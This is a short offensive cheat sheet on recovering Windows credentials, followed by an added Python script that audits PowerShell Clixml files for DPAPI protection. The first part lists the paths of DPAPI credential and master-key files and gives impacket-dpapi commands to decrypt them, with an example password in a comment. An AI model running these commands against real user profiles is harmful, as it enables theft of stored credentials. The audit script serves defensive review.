dpapi-creds
Decrypt PowerShell credentials in the context of the user, or abuse DPAPI.

    $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
    $credential.GetNetworkCredential().username

Abuse DPAPI

DPAPI

    cmd /c c:\users\%USERNAME%\appdata\local\microsoft\credentials\
    cmd /c c:\users\%username%\appdata\roaming\microsoft\credentials\
    cmd /c c:\users\%username%\appdata\roaming\microsoft\protect\<user sid>
    c:\users\%username%\appdata\local\microsoft\protect\<user sid>
    impacket-dpapi masterkey -file <master key> -sid <user_sid> #-password Zer0The0ne
    impacket-dpapi credential -file <cred file> -key <obtained key>
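
For auditing where such credential files sit on disk, the following is an added example (not from the original page) that lists every SecureString in an Export-Clixml file, checks that it is a DPAPI blob rather than the unencrypted form PowerShell writes on non-Windows systems, and reports the GUID of the master key protecting it. The function name `audit_clixml`, the account name and the sample document are constructed for illustration.

```python
import uuid
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
NS = {"ps": PS_NS}
# Every DPAPI blob starts with dwVersion = 1 followed by the DPAPI provider GUID.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")


def audit_clixml(xml_text):
    """List every SecureString (<SS>) in a CLIXML document and how it is protected."""
    findings = []
    for props in ET.fromstring(xml_text).iter("{%s}Props" % PS_NS):
        user = props.find("ps:S[@N='UserName']", NS)
        for ss in props.findall("ps:SS", NS):
            try:
                blob = bytes.fromhex((ss.text or "").strip())
            except ValueError:
                blob = b""  # not hex at all: treat as unprotected/unknown
            dpapi = blob.startswith(DPAPI_HEADER) and len(blob) >= 40
            findings.append({
                "property": ss.get("N"),
                "user": user.text if user is not None else None,
                "dpapi_protected": dpapi,
                # Bytes 24..39 hold the GUID of the master key wrapping this blob;
                # it matches a file name under ...\microsoft\protect\<user sid>.
                "masterkey_guid": str(uuid.UUID(bytes_le=blob[24:40])) if dpapi else None,
            })
    return findings


# Constructed sample data (not real credentials or real key GUIDs).
SAMPLE_GUID = uuid.UUID("11111111-2222-3333-4444-555555555555")
DPAPI_HEX = (DPAPI_HEADER + (1).to_bytes(4, "little")
             + SAMPLE_GUID.bytes_le + bytes(32)).hex()
PLAIN_HEX = "5000400073007300"  # constructed value with no DPAPI header
SAMPLE = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0"><T>System.Management.Automation.PSCredential</T></TN>
    <Props>
      <S N="UserName">svc_backup</S>
      <SS N="Password">{}</SS>
    </Props>
  </Obj>
</Objs>"""

if __name__ == "__main__":
    for secret in (DPAPI_HEX, PLAIN_HEX):
        print(audit_clixml(SAMPLE.format(secret)))
```

A finding with `dpapi_protected` set to `False` means the file offers no encryption at rest; a finding with a master key GUID identifies which key to treat as exposed if that user's profile is compromised.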